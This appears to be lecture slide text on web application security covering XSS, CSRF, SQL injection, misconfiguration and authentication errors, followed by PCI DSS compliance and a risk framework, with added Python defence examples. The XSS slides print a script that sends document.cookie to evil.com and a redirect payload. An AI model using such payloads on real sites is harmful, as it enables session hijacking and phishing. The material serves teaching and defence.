- Attack targets the user of the system rather than the system itself
- Uses client-side languages, executing within the user’s web environment with the same level of privileges as the hosted site
- Use XSS to exploit a browser hole to download a Trojan/virus
- Client-side scripting languages
-- DHTML (HTML, XHTML, HTML x.0)
-- JavaScript, Java (applets), VBScript
-- Flash, ActiveX, XML/XSL, CSS
1. Attacker injects malicious code into vulnerable web server
2. Victim visits vulnerable web server
3. Malicious code is served to victim by web server
4. Malicious code executes in the victim’s browser with the web server’s privileges
Stealing cookie via XSS
• Attacker injects script that reads the site’s cookie
• Script sends the cookie to the attacker
• Attacker can now log into the victim’s site
<script>
var img = new Image();
img.src = "http://evil.com/log_cookie.php?" + document.cookie;
</script>
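An added example, not from the lecture, of the server-side mitigations for the cookie-stealing scenario above: output encoding of reflected input and an HttpOnly session cookie; the comment markup, the session id and the fact that the slide's payload arrives through a comment field are constructed assumptions:

```python
import html
from http.cookies import SimpleCookie

# Constructed input, not from the lecture: the cookie-stealing payload from
# the slide above, as it might arrive in a comment form field.
INJECTED = ('<script>var img = new Image();'
            'img.src = "http://evil.com/log_cookie.php?" + document.cookie;'
            '</script>')

def render_comment_unsafe(text):
    """Reflects the input verbatim: the browser sees a real <script> element
    and runs it with the hosting site's privileges."""
    return '<p class="comment">' + text + '</p>'

def render_comment_escaped(text):
    """Output encoding for an HTML text context: <, >, &, ' and " become
    entities, so the payload is rendered as text and never executed."""
    return '<p class="comment">' + html.escape(text, quote=True) + '</p>'

def session_cookie_header(session_id):
    """HttpOnly keeps the cookie out of document.cookie, so a script that
    does run cannot read it; Secure limits it to HTTPS; SameSite=Strict keeps
    it off cross-site requests. session_id is whatever the app generated."""
    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["httponly"] = True
    cookie["session"]["secure"] = True
    cookie["session"]["samesite"] = "Strict"
    cookie["session"]["path"] = "/"
    return cookie.output(header="Set-Cookie:")
```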
Redirect the user via XSS
• Attacker injects script that automatically redirects victim to attacker’s site
<script>
document.location = "http://evil.com";
</script>
Phishing via XSS
• Attacker injects a script that redirects the victim to a “familiar website” (e.g. the site of a bank)
• Fake page asks for user’s credentials or other sensitive information
• The attacker now has everything needed to log in (and transfer money)
Privacy Violation via XSS
• Attacker’s script determines the sites the victim has visited in the past
• This information can be used for targeted phishing attacks
Cross-Site Request Forgery (CSRF)
1. Victim is logged into vulnerable web site
2. Victim visits attacker’s web site
3. Malicious content is delivered to victim
4. Victim involuntarily sends a request to the vulnerable web site
SQL Injection
Attacker submits HTTP request with a malicious parameter value that modifies an existing SQL query, or adds new queries
Misconfiguration
- outdated versions of the server
- outdated versions of third-party web applications
- guessable passwords (application, FTP/SSH)
- retrievable source code
• Do not rely on client-side controls that are not enforced on the server side
-- Cookie
Cookie: role=guest
Cookie: role=admin
-- Hidden form parameters
<input type="hidden" name="role" value="guest">
<input type="hidden" name="role" value="admin">
-- JavaScript checks
function validateRole() { return 1; }
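An added example, not from the lecture, serving both the CSRF flow above and this slide on client-side controls: a server-side session store holds the role and a per-session CSRF token, and the request handler decides only on that state; SESSIONS, the action names and the hypothetical handle_post function are constructed assumptions:

```python
import hmac
import secrets

# Constructed server-side session store (not from the lecture). The session id
# handed to the browser is opaque; the role and the CSRF token stay here.
SESSIONS = {}
ADMIN_ONLY = {"delete_user"}   # constructed list of privileged actions

def create_session(role):
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"role": role, "csrf": secrets.token_urlsafe(32)}
    return sid

def csrf_field_html(sid):
    """Hidden field the site puts in its own forms. A page on the attacker's
    site cannot read it, so a request it triggers (step 4) lacks the token."""
    return '<input type="hidden" name="csrf" value="%s">' % SESSIONS[sid]["csrf"]

def handle_post(cookies, form, action):
    """Hypothetical handler for a state-changing request. Every decision is
    taken on server-held state; cookies and form fields only identify it."""
    session = SESSIONS.get(cookies.get("session", ""))
    if session is None:
        return 401, "not logged in"
    # The browser attaches the session cookie to a forged request too, so
    # the cookie alone must not authorize the action: require the token.
    if not hmac.compare_digest(form.get("csrf", ""), session["csrf"]):
        return 403, "missing or invalid CSRF token"
    # role=admin in a cookie or a hidden field (this slide's examples) is
    # never consulted; only the role recorded at login counts.
    if action in ADMIN_ONLY and session["role"] != "admin":
        return 403, "forbidden"
    return 200, action + " accepted"
```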
Authentication Errors
- weak passwords
- brute forceable (enforce an upper limit on the number of errors in a given time)
- verbose failure messages (“wrong password”): do not leak information
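An added example, not from the lecture, covering the Username/Password Enumeration slides and the brute-force and verbose-message points above: one generic failure message, the same hashing work for unknown and known usernames, and a cap on failures per time window; the user store, the PBKDF2 parameters and the limits are constructed assumptions:

```python
import hashlib
import hmac
import os
import time

# Constructed user store, not from the lecture: salted PBKDF2-SHA256 hashes.
def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

_SALT = os.urandom(16)
USERS = {"alice": (_SALT, _hash("correct horse", _SALT))}
# Stand-in record for unknown usernames, so that path does the same hashing
# work as a real one and response time does not reveal which names exist.
_DUMMY = (os.urandom(16), _hash("placeholder", os.urandom(16)))

MAX_FAILURES, WINDOW_SECONDS = 5, 600      # constructed limits
FAILURES = {}                              # username -> failure timestamps
GENERIC = "Invalid username or password"   # never "Invalid Username" / "Incorrect Password"
LOCKED = "Too many attempts, try again later"

def login(username, password, now=None):
    """Returns (success, message). The message and the work done are the
    same whether the username exists or not."""
    now = time.time() if now is None else now
    recent = [t for t in FAILURES.get(username, []) if now - t < WINDOW_SECONDS]
    if len(recent) >= MAX_FAILURES:
        FAILURES[username] = recent
        return False, LOCKED
    salt, stored = USERS.get(username, _DUMMY)
    computed = _hash(password, salt)           # always computed
    ok = username in USERS and hmac.compare_digest(computed, stored)
    if not ok:
        FAILURES[username] = recent + [now]
        return False, GENERIC
    FAILURES.pop(username, None)
    return True, "Welcome"
```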
Compliance
Payment Card Industry Data Security Standard (PCI-DSS)
• A proprietary information security standard for organizations that handle branded credit cards from major card schemes (Visa, MasterCard, American Express, Discover, JCB and China UnionPay)
• Private cards which are not part of a major card scheme are not included in the scope of PCI DSS
• It is mandated by the card brands and administered by the Payment Card Industry Security Standards Council
PCI DSS
• Its purpose is to increase controls around cardholder data to reduce credit card fraud via its exposure
• Validation of compliance
- needs to be done every year
- either by an external Qualified Security Assessor (QSA) that creates a Report on Compliance (ROC) for organizations handling large volumes of transactions
- or by a Self-Assessment Questionnaire (SAQ) for companies handling smaller volumes
PCI DSS
• PCI DSS originally began as 5 different programs
- Visa’s Cardholder Information Security Program
- MasterCard’s Site Data Protection
- American Express’ Data Security Operating Policy
- Discover’s Information Security and Compliance
- JCB’s Data Security Program
• All 5 programs had the same targets
- create an additional level of protection for card issuers
- ensure merchants meet a minimum level of security when they store/process/transmit cardholder data
• PCI SSC was formed in Dec 2004 when these 5 companies released PCI DSS
PCI DSS
• Version 1.0 (Dec 2004)
• Version 1.1 (Sep 2006) – clarifications on v1.0
• Version 1.2 (Oct 2008) – enhancements on addressing risks and threats
• Version 2.0 (Oct 2010)
• Version 3.0 (Nov 2013)
• Version 3.1 (Apr 2015) – current one
PCI DSS
PCI DSS specifies 12 requirements for compliance, organized into 6 logically related groups called “control objectives”
PCI DSS
PCI SSC released several supplemental pieces of information for extra clarification
• Information Supplement: Requirement 11.3 Penetration Testing
• Information Supplement: Requirement 6.6 Code Reviews and Application Firewalls Clarified
• Navigating the PCI DSS: Understanding the Intent of the Requirements
• Information Supplement: PCI DSS Wireless Guidelines
• In the event of a security breach, any compromised entity which WAS NOT PCI DSS compliant at the time of breach will be subject to additional card scheme penalties, such as fines
Risk Management Framework
Identify
- Ensure your company I.T. governance policies exist and are current
- Verify all key stakeholders know about them
Protect
- Know how your data flows
- Understand where it flows from and to and how it’s protected
- Check for vulnerabilities and data leakage
- Policies exist, are current and follow governance
- Seek insurance policies to help cover the risk
Detect
- Detection for anomalies is in place
- Real-world testing is performed periodically
Respond
- Review action plans associated with the event of a breach
- Are skilled personnel on hand in the event of a breach?
Recover
- Establish a recovery plan to implement after a breach
- Prepare communication of recovery to internal and external parties affected
Conclusions
• No business is immune from a data breach
• Security is a boardroom issue
• Many executives don’t understand their organization’s information data flow and/or how it is being protected
• Threats can come in all sorts of shapes and sizes
• Insider misuse leads to inadvertent data leakage and breaches
• The threat is not only technical: educate your employees